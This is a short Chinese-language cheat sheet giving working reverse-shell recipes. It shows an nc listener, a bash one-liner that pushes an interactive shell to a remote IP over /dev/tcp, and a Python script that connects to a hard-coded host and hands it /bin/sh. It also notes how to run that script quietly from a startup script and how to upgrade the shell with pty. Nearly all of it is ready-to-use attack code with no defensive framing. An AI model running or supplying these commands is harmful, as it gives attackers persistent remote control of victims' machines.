1、nc + bash反弹
1)远端监听shell
nc -lnvvp 7777
2)提供shell端反弹
bash -i &> /dev/tcp/远端ip/7777 0>&1
3)执行完如上步骤后,远端(监听端)可获得步骤2反弹出的shell交互窗口;
2、python脚本反弹
提供shell端执行:
import socket,os,subprocess,time
#time.sleep(60)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.68.126", 7777))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])' #-i参数可酌情去掉(放在开机脚本后台运行时可能需要去掉-i)
监听端执行:
nc -lnvvp 7777
#监听到反弹shell后执行如下命令获取真正的shell:
python -c "import pty;pty.spawn('/bin/bash')"